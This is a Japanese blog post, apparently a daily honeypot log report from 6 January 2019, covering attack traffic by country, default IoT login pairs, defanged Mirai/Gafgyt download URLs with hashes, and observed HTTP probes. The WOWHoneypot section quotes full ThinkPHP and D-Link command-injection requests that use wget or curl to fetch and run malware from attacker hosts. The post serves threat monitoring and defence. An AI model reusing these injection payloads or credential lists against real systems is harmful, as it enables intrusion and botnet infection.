ハニーポット観察日記(2019/01/06) 「イタリアからのアクセス件数が過去最大」
はじめに
こんにちは。cute_otterです。
今日から本業が始まったので、投稿が遅くなってしまいました。(明日以降も遅れるかもしれないです)
Cowrie
ハニーポット「Cowrie」で2019/01/06 (日) 00:00~23:59 UTC(運用55日目)に取得したログの簡易分析です。
概況
- 集計期間 : 2019/01/06 (日) 00:00~23:59 UTC
- 総イベント件数 : 1,064,395 件 (前日比 -3,276 件)
- コマンド実行成功 : 471,551 件 (前日比 -900 件)
- コマンド入力 : 371,887 件 (前日比 +12,201 件)
- ファイルダウンロード成功 : 72,523 件 (前日比 -515 件)
- セッションクローズ : 32,414 件 (前日比 -1,002 件)
- 新しいコネクション : 32,411 件 (前日比 -1,005 件)
- コマンド実行失敗 : 19,781 件 (前日比 -12,004 件)
- ログイン成功 : 13,980 件 (前日比 -747 件)
- 外部へのTCP/IPリクエストの送出 : 10,745 件 (前日比 +1,135 件)
- TTYログ取得終了 : 9,697 件 (前日比 -792 件)
- Cowrieによってエミュレートされたアーキテクチャ : 9,696 件 (前日比 -793 件)
- ファイルダウンロード失敗 : 8,097 件 (前日比 +2,598 件)
- クライアントのSSHバージョン : 4,512 件 (前日比 +118 件)
- SSH鍵交換 : 4,504 件 (前日比 +127 件)
- 外部へのTCP/IPデータの送出 : 2,107 件 (前日比 +183 件)
- ログイン失敗 : 478 件 (前日比 -1,890 件)
- クライアントの環境設定 : 8 件 (前日比 +-0 件)
- ターミナルサイズ : 4 件 (前日比 +2 件)
- ログイン試行件数 : 14,458 件 (前日比 -2,637 件)
- SSHコネクション件数 : 13,164 件 (前日比 +95 件)
- Telnetコネクション件数 : 19,247 件 (前日比 -1,100 件)
- ユニークIPアドレス件数 : 274 件 (前日比 -196 件)
- アクセス元の国数 : 50 カ国 (前日比 -2 カ国)
- TTY件数 : 9,697 件 (前日比 -792 件)
特徴
- 総イベント件数が減少
- 前日(2019/01/05)より3,200件ほど減少
- 総イベント件数は減少したが、
コマンド入力
は前日(2019/01/05)より12,000件ほど増加
- ログイン試行件数の減少
- 前日(2019/01/05)より2,600件ほど減少
- Telnetコネクション件数の減少
- 前日(2019/01/05)より1,000件ほど減少
- ユニークIPアドレス件数の減少
- 前日(2019/01/05)より200件ほど減少
イタリア
からのアクセス件数が大幅に増加- 前日(2019/01/05)より28万件ほど増加
- 過去最大のアクセス件数となりました。
ダッシュボード
ダッシュボードは以下の通りです。
国別のアクセス件数
国別のアクセス件数の変遷(2019/01/06)は以下の通りです。
続いて、国別のアクセス件数(上位20位)は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | Italy | 525,601 | 2. | 242,216 | +283,385 | - |
2. | United States | 483,630 | 1. | 547,428 | -63,798 | - |
3. | United Kingdom | 19,032 | 3. | 48,606 | -29,574 | - |
4. | Ireland | 15,488 | 8. | 15,121 | +367 | - |
5. | Latvia | 5,144 | 13. | 3,400 | +1,744 | - |
6. | Singapore | 4,333 | 12. | 4,507 | -174 | - |
7. | Germany | 4,014 | 21. | 1,541 | +2,473 | - |
8. | Romania | 1,488 | 28. | 528 | +960 | - |
9. | Russia | 1,474 | 5. | 37,078 | -35,604 | - |
10. | Netherlands | 733 | 20. | 1,546 | -813 | - |
11. | Canada | 654 | 17. | 2,466 | -1,812 | - |
12. | China | 582 | 4. | 44,427 | -43,845 | - |
13. | Vietnam | 381 | 15. | 2,574 | -2,193 | - |
14. | Brazil | 305 | 26. | 610 | -305 | - |
15. | Spain | 284 | 11. | 9,736 | -9,452 | - |
16. | Sweden | 248 | 36. | 151 | +97 | - |
17. | Republic of Korea | 191 | 7. | 25,096 | -24,905 | - |
18. | France | 130 | 14. | 3,011 | -2,881 | - |
19. | Turkey | 120 | 23. | 854 | -734 | - |
20. | India | 60 | 19. | 2,266 | -2,206 | - |
- 前日(2019/01/05)は14時~15時の期間にアクセスが集中していましたが、今日は0時~15時の期間に、継続的に4~6万件のアクセスがありました。16時以降は4万件を超えることはありませんでした。
イタリア
からのアクセス件数が前日(2019/01/05)の242,216件から28万件ほど増加し、525,601件となりました。- 0時~16時にアクセスが集中していました。
- 過去最大のアクセス件数となりました。
アメリカ
からのアクセス件数が前日(2019/01/05)の547,428件から6万件ほど減少し、483,630件となりました。- 前日(2019/01/05)は、普段アクセス件数が少ない
イスラエル
、韓国
、キプロス
、アゼルバイジャン
、スペイン
からのアクセス件数が大幅に増加しましたが、今日は大幅に減少しました。 - また、前日(2019/01/05)に、普段から一定のアクセス件数がある
イギリス
、中国
、ロシア
からのアクセス件数が増加しましたが、今日は大幅に減少しました。
イタリアからのアクセス件数の変遷
イタリアからのアクセス件数の変遷(2018/12/24~2019/01/06)は以下の通りです。
2018/12/26から件数が増加し始め、2018/12/28に、一時的に件数が減少しました。
しかし、2018/12/29から再び件数が増加し始め、2018/12/30~2019/01/01にかけてピークを迎え、毎日30万件以上のアクセスがありました。
2019/01/02には件数が大幅に減少し、430件となりましたが、2019/01/03から再び増加し始め、2019/01/04には327,194件となりました。
2019/01/05は8万件ほど減少して242,216件となりましたが、2019/01/06には525,601件となり、過去最大となりました。
イベント件数
イベント件数の変遷(2019/01/06)は以下の通りです。
- 5時と15時にイベント件数が増加しました。
- 16時以降は徐々にイベント件数が減少しました。
国別のログイン試行
国別のログイン試行の件数(上位10位)は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | Italy | 4,826 | 3. | 2,262 | +2,564 | - |
2. | United States | 4,373 | 1. | 5,334 | -961 | - |
3. | United Kingdom | 2,274 | 2. | 2,475 | -201 | - |
4. | Ireland | 1,930 | 4. | 1,914 | +16 | - |
5. | Canada | 317 | 9. | 353 | -36 | - |
6. | Russia | 164 | 6. | 723 | -559 | - |
7. | Latvia | 111 | 19. | 73 | +38 | - |
8. | Singapore | 98 | 17. | 104 | -6 | - |
9. | China | 70 | 5. | 768 | -698 | - |
10. | Germany | 61 | 20. | 47 | +14 | - |
イタリア
からのログイン試行件数が前日(2019/01/05)より2,500件ほど増加し、4,826件となりましたアメリカ
からのログイン試行件数が前日(2019/01/05)より960件ほど減少し、4,373件となりました。- 前日(2019/01/05)にログイン試行件数が増加していた
イギリス
、ロシア
、中国
の件数が減少しました。
ログイン試行で使用されたユーザ名とパスワード
ログイン試行の際に使用されたユーザ名とパスワードの組み合わせ(上位20位)は以下の通りです。
順位 | ユーザ名 | パスワード | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|---|
1. | admin | admin | 4,365 | 1. | 4,282 | +83 | - |
2. | root | 88888888 | 1,702 | 2. | 864 | +838 | - |
3. | guest | 123456 | 862 | 4. | 441 | +421 | - |
4. | root | GM8182 | 861 | 3. | 443 | +418 | Grain Media製のDVRを狙ったものと思われる(参照) |
5. | support | 1234 | 849 | 5. | 424 | +425 | - |
6. | admin | admin1 | 848 | 6. | 424 | +424 | - |
7. | root | (空欄) | 312 | 7. | 325 | -13 | - |
8. | root | vizxv | 279 | 8. | 289 | -10 | Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照) |
9. | root | 666666 | 255 | 10. | 270 | -15 | Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照) |
10. | user | user | 244 | 9. | 279 | -35 | - |
11. | root | 888888 | 238 | 13. | 210 | +28 | Zhejiang Dahua Technology製のDVRを狙ったものと思われる(参照) |
12. | root | pass | 204 | 11. | 235 | -31 | - |
13. | root | 123456 | 191 | 12. | 222 | -31 | - |
14. | support | support | 170 | 16. | 178 | -8 | - |
15. | root | 12345 | 168 | 15. | 189 | -21 | - |
16. | root | system | 159 | 19. | 169 | -10 | - |
17. | root | default | 155 | 14. | 200 | -45 | - |
18. | root | xc3511 | 154 | 17. | 175 | -21 | Xiongmai製のDVRを狙ったものと思われる(参照) |
19. | root | hi3518 | 149 | 18. | 173 | -24 | HiSilicon Technologies製のIPカメラを狙ったものと思われる(参照) |
20. | admin | 4321 | 144 | 20. | 161 | -17 | - |
admin/admin
の組み合わせのほとんどがイギリス
とアイルランド
からのログイン試行の際に使用されていました。- イギリスが2,214件(4,365件中)、アイルランドが1,927件(4,365件中)でした。
root/88888888
、root/GM8182
、guest/123456
、support/1234
、admin/admin1
の組み合わせのほとんどがイタリア
からのログイン試行の際に使用されていました。root/88888888
は1,595件(1,702件中)でした。guest/123456
は806件(862件中)でした。root/GM8182
は803件(861件中)でした。support/1234
は796件(849件中)でした。admin/admin1
は796件(848件中)でした。
ダウンロードされたファイル
ダウンロードされたファイルは以下の通りです。
※VT : VirusTotal
順位 | ダウンロード元 | MD5 | 検出率(VT) | 件数 | 備考 |
---|---|---|---|---|---|
1. | hxxp://195[.]231[.]0[.]185:80/AB4g5/Josho[.]x86 | aa496313be71695fda7e415999233aa9 | 19/55 | 4,641 | Mirai |
2. | hxxp://198[.]98[.]62[.]237:80/bins/mirai[.]x86 | 4147e375f325878fe3c3962c3d4ac411 | 37/57 | 2,580 | Mirai |
3. | hxxp://206[.]189[.]188[.]228:80/bins/hoho[.]x86 | 2d46b69ac12c590f01eb65d7b987f365 | 20/59 | 131 | Mirai |
4. | hxxp://167[.]99[.]229[.]112:80/8x868 | a65849fe667dcc5eadd920d427785642 | 21/57 | 120 | Gafgyt |
5. | hxxp://167[.]99[.]224[.]50:80/AB4g5/Josho[.]x86 | a5381334416e082e697ee2b1ea07927b | 17/56 | 102 | Mirai |
6. | hxxp://46[.]183[.]218[.]243:80/33bi/Ares[.]x86 | e68bd8a8712ce1788faa15c9813c00ab | 20/60 | 98 | Mirai |
7. | hxxp://178[.]128[.]214[.]44:80/Kuso69/Akiru[.]x86 | 0f6fa2e22d9de3864e7d60ed6c0cb4b5 | 34/60 | 93 | Mirai |
8. | hxxp://209[.]141[.]43[.]15:80/bins/x86 | 6eb899d1b251aff0518c4212a3340d01 | 21/56 | 89 | Mirai |
9. | hxxp://209[.]141[.]43[.]15:80/bins/x86 | d3f0f38a282c261ea2fea7068b9615e4 | 27/58 | 82 | Mirai |
10. | hxxp://193[.]148[.]69[.]33:80/bins/apep[.]x86 | 5f907e801696ad157f15421de5691733 | 19/59 | 21 | Mirai |
11. | hxxp://bot[.]sunless[.]network:80/sunless[.]x86 | a1959a7398028269218eaca678685a32 | 10/57 | 18 | Mirai |
12. | hxxp://209[.]97[.]185[.]168:80/bins/kirai[.]x86 | 3906a2f9b3192664762e3f6eb84f4c18 | 22/58 | 17 | Mirai |
13. | hxxp://209[.]141[.]57[.]94/bins[.]sh | b05e61bc07d161f9fdda1fa8cb744514 | 21/57 | 12 | -|Mirai(ダウンローダー?) |
14. | hxxp://206[.]189[.]188[.]228:80/AB4g5/Josho[.]x86 | b3cacdc6b5bb4b4fd74d49b0fbfa575b | 20/59 | 11 | Mirai |
15. | hxxp://217[.]61[.]105[.]126:80/shiro[.]x86 | eb50a4263374adffbe9ee66c19c3473c | 9/59 | 11 | Mirai or Gafgyt |
16. | hxxp://167[.]99[.]219[.]142:80/bins/dark[.]x86 | c81e2c6cae869a1c5b59d0fda16f4794 | 19/59 | 9 | Mirai |
17. | hxxp://193[.]148[.]69[.]33:80/bins/telnet[.]x86 | f81cb52b13c0ad74247db720ffe5fa36 | 15/59 | 8 | Mirai |
18. | hxxp://139[.]59[.]25[.]145:80/bins/sora[.]x86 | e4ae3f23bbdbcb67b52be4616ffe280b | 21/57 | 7 | Mirai |
19. | hxxp://185[.]244[.]25[.]174:80/bins/hoho[.]x86 | a40b8c790d6db3262ec9ab308caf62eb | 24/59 | 6 | Mirai |
20. | hxxp://185[.]248[.]140[.]102:80/bins/clean[.]x86 | 76eb95ff74919eb2e06c9a0273882686 | 9/59 | 6 | Mirai |
21. | hxxp://199[.]38[.]243[.]9:80/33bi/mirai[.]x86 | 564e572d77a86ab7161b4b67b7f81981 | 24/58 | 6 | Mirai |
22. | hxxp://185[.]248[.]140[.]102:80/bins/clean[.]x86 | b87c872eb23378b590f910314d0854de | 10/58 | 5 | Mirai |
23. | hxxp://185[.]248[.]140[.]102:80/bins/clean[.]x86 | 4ead648aad002e6b4d8bd8da75d4ea77 | 10/57 | 4 | Mirai |
24. | hxxp://194[.]36[.]173[.]4:80/vi/x86[.]bushido | 236cc078eb84e9e14f1112a52e74abc9 | 36/59 | 3 | Mirai |
25. | hxxp://185[.]248[.]140[.]102:80/bins/clean[.]x86 | a45021797efbfa00dd8eff40e9302ddb | 10/56 | 2 | Mirai |
26. | hxxp://185[.]248[.]140[.]102:80/bins/clean[.]x86 | 3d373504fea89e079131c31890e1167a | 10/58 | 2 | Mirai |
27. | hxxp://185[.]248[.]140[.]102:80/bins/clean[.]x86 | fc502020959a5cd8b2375e1a80623e0c | 10/58 | 2 | Mirai |
28. | hxxp://167[.]99[.]11[.]34:80/bins/hoho[.]x86 | 1b4928722d29fe8ac656d541585ba9e6 | 20/59 | 2 | Mirai |
29. | hxxp://193[.]148[.]69[.]33:80/bins/apep[.]x86 | 04159fd26a377aa7bb01c5450be95fd8 | 16/59 | 1 | Mirai |
30. | hxxp://185[.]244[.]25[.]241/usviibins[.]sh | e59a19358a1df1e97ccf58f2740f1e4c | 26/57 | 1 | Mirai(ダウンローダー?) |
31. | hxxp://217[.]61[.]105[.]126:80/shiro[.]x86 | bfaf3d11d11b645c9a2002354248a024 | 20/58 | 1 | Mirai |
32. | hxxp://185[.]133[.]193[.]118:80/bins/penthouse[.]x86 | 2eb8510c97761cdc6be9913297356815 | 15/57 | 1 | Mirai |
- Mirai(亜種含む)やGafgyt(亜種含む)と思われるマルウェアがダウンロードされていました。
外部へのTCP/IPデータの送出
SSHでログインした直後に、以下のデータを1秒ごとに20回ほど繰り返して送信した後、ログアウトしていました。
SSHにログインする際のユーザ名とパスワードの組み合わせはadmin/abc123!@)
でした。
GET /test.php HTTP/1.1\r\nUser-Agent: curl/7.35.0\r\nHost: 167[.]114[.]159[.]146\r\nAccept: */*\r\n\r\n
侵入に成功したサーバーを踏み台として利用して、WebShellの探査を行っているのでしょうか?
詳しい方がいらっしゃいましたらご教授ください...
Cowrieで取得したログの簡易分析は以上です。
WOWHoneypot
続いて、ハニーポット「WOWHoneypot」で2019/01/06 (日) 00:00~23:59 UTC(運用3日目)に取得したログの簡易分析です。
概況
- 集計期間 : 2019/01/06 (日) 00:00~23:59 UTC
- 総アクセス件数 : 217 件 (前日比 -841 件)
- ユニークIPアドレス件数 : 30 件 (前日比 +7 件)
- アクセス元の国数 : 17 カ国 (前日比 -1 件)
特徴
- 総アクセス件数が減少
- 前日(2019/01/05)より841件ほど減少
国別のアクセス件数
国別のアクセス件数は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | China | 187 | 1. | 458 | -271 | - |
2. | Brazil | 9 | 5. | 3 | +4 | - |
3. | United States | 6 | 4. | 6 | +-0 | - |
4. | Indonesia | 2 | 6. | 2 | +-0 | - |
5. | Greece | 1 | - | 0 | +1 | - |
6. | Georgia | 1 | - | 0 | +1 | - |
7. | Turkey | 1 | - | 0 | +1 | - |
8. | Russia | 1 | 12. | 1 | +-0 | - |
9. | India | 1 | 10. | 1 | +-0 | - |
10. | Czechia | 1 | - | 0 | +1 | - |
11. | Ukraine | 1 | - | 0 | +1 | - |
12. | Thailand | 1 | 3. | 228 | -227 | - |
13. | Bangladesh | 1 | - | 0 | +1 | - |
14. | Canada | 1 | - | 0 | +1 | - |
15. | Poland | 1 | - | 0 | +1 | - |
16. | Sweden | 1 | - | 0 | +1 | - |
17. | Colombia | 1 | - | 0 | +1 | - |
- 前日(2019/01/05)にアクセス件数が多かった
香港
、タイ
からの件数が大幅に減少しました。
メソッド
メソッドの件数は以下の通りです。
順位 | メソッド | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | GET | 143 | 1. | 543 | -400 | - |
2. | POST | 73 | 2. | 511 | -438 | - |
3. | PROPFIND | 1 | 3. | 4 | -3 | - |
HTTPバージョン
HTTPバージョンの件数は以下の通りです。
順位 | HTTPバージョン | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | HTTP/1.1 | 214 | 1. | 1057 | -843 | - |
2. | HTTP/1.0 | 3 | 2. | 1 | +2 | - |
HTTP/1.0
は/
へのアクセスでした。
Tomcatの管理ページにおけるBasic認証
Tomcatの管理ページ(/manager/html)におけるBasic認証で使用されたユーザ名とパスワードの組み合わせは以下の通りです。
順位 | ユーザ名 | パスワード | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|---|
1. | admin | (空欄) | 1 | 1. | 3 | -2 | - |
2. | admin | 123456 | 1 | 3. | 3 | -2 | - |
3. | admin | tomcat | 1 | 4. | 3 | -2 | - |
4. | tomcat | tomcat | 1 | 6. | 3 | -2 | - |
5. | tomcat | 123456 | 1 | 7. | 3 | -2 | - |
6. | tomcat | admin | 1 | 8. | 3 | -2 | - |
7. | tomcat | s3cret | 1 | 9. | 3 | -2 | - |
アクセス先
アクセス先(上位15位+気になったもの)は以下の通りです。
順位 | アクセス先 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | GET / HTTP/1.1 | 23 | 2. | 17 | +6 | トップページへのアクセス |
2. | GET /manager/html HTTP/1.1 | 8 | 1. | 30 | -22 | Tomcatの管理ページに対するログイン試行 |
3. | GET / HTTP/1.0 | 3 | 316. | 1 | +2 | トップページへのアクセス |
4. | GET /shell.php HTTP/1.1 | 2 | 6. | 8 | -6 | WebShellの探査 |
5. | GET /cmd.php HTTP/1.1 | 2 | 7. | 8 | -6 | WebShellの探査 |
6. | POST /xx.php HTTP/1.1 | 2 | 8. | 8 | -6 | WebShellの探査 |
7. | POST /conflg.php HTTP/1.1 | 2 | 9. | 8 | -6 | WebShellの探査 |
8. | POST /q.php HTTP/1.1 | 2 | 10. | 8 | -6 | WebShellの探査 |
9. | POST /qq.php HTTP/1.1 | 2 | 3. | 12 | -10 | WebShellの探査 |
10. | GET /admin/phpMyAdmin/index.php HTTP/1.1 | 2 | 11. | 8 | -6 | phpMyAdminの探査 |
11. | GET /public/index.php?s=/index/\Cthink\Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=cd%20/tmp;wget%20hxxp://185[.]244[.]25[.]174/bunny[.]x86;cat%20bunny[.]x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1 | 1 | - | 0 | +1 | ThinkPHPフレームワークの脆弱性(RCE)を狙った攻撃(参照) |
12. | GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=cd%20/tmp;curl%20-O%20hxxp://185[.]244[.]25[.]174/bunny[.]x86;cat%20bunny[.]x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1 | 1 | - | 0 | +1 | ThinkPHPフレームワークの脆弱性(RCE)を狙った攻撃(参照) |
13. | GET /xmlrpc.php HTTP/1.1 | 1 | - | 0 | +1 | WordPressのXML-RPCの探査 |
14. | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185[.]101[.]105[.]129/kalon[.]mips%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1 | 1 | - | 0 | +1 | D-Link製のルーターの脆弱性(OSコマンドインジェクション)を狙った攻撃と思われる |
15. | PROPFIND / HTTP/1.1 | 1 | 21. | 4 | -3 | Microsoft IIS 6.0の脆弱性CVE-2017-7269を狙った攻撃 |
- XML-RPCの探査を初めて観測しました。
WOWHoneypotで取得したログの簡易分析は以上です。